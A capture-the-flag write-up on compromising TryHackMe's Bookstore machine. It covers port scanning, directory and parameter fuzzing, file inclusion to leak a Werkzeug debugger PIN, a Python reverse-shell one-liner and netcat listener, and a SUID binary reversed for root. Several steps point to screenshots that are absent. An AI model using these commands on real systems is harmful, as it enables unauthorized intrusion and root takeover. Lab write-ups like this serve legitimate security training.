Bookstore — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Bookstore — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports:

nmap -A -T4 -v -p- <ip>

There’re 3 ports opened: 22(SSH), 80(Apache), and 5000(Werkzeug). Werkzeug is a python web’s api. Let’s first access the website at port 80:

I’ve checked the page source (Ctrl+U), but nothing valuable.

Now let’s access /books:

View source:

There’s a base32 encoded string. Decode it using https://www.dcode.fr/base-32-encoding:

Then, decode the ascii and I found a youtube link:

Access the youtube:

Well looks like it’s a rabbit hole.

Next, access /login:

Page source:

So I need to exploit the debugger side. Access port 5000:

Use gobuster to find hidden dirs on this port:

gobuster dir -u http://<ip>:5000 -w /path-to-wordlist

Robots.txt:

Nothing here.

/console:

Well, in order to access /console, I need the PIN. By looking back at the page source of login.html page, I know that theb is inside .bash_history file.

Access /api:

Ok so now I know the parameter of the api. So I tried LFI to look for .bash_history but none successful. I even tried to downgrade the api version (v2 to v1) but still invulnerable:

So I think that there’s another parameter which I can use for LFI. I use WFUZZ to fuzz for the hidden parameter:

wfuzz -c -f bookstore.txt -u “http://<ip>:5000/api/v1/resources/books?FUZZ=.bash_history” -w /path-to-wordlist -t 100 2>/dev/null — hc 404

Ok so I’ve found the hidden parameter. Let’s use this parameter for LFI:

http://<ip>:5000/api/v1/resources/books?the-parameter=.bash_history

I’ve got the PIN! It’s time for /console:

I’ve got into the console. I can run Python code here, so let’s spawn a reverse shell to my machine. First, start a listener on your machine:

nc –lvnp 4444

Then run this python code in the web’s console:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<ip> “,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)

After that, I’ve got the shell into the machine as sid:

Get the user flag:

Next, I will find a way to priv escalation to root. First, try sudo –l to see if sid can run sudo:

Well, I haven’t known sid’s password, so I cannot run sudo now. Try with command SUID using find:

find / -perm -u=s 2>/dev/null

This command looks suspicious. Let’s inspect it:

Execute it:

So I need to find the correct number. First, transfer the try-harder script to your machine using scp:

scp try-harder user-name@<ip>:/home/username

Then, use ghidra to decompile the script:

Ok, so if I input the correct number, I will have the bash shell as root (as –p flag will execute bash with SUID, and this command has SUID of root).

Decode the hex to text and I’ve got all the number needed:

Ok so here’s the formula:

“^” means XOR. So a will be: 1573743953

Input this number and I’ve got the root shell! Read the root flag:

The end.

HAPPY HACKING

I’m Groot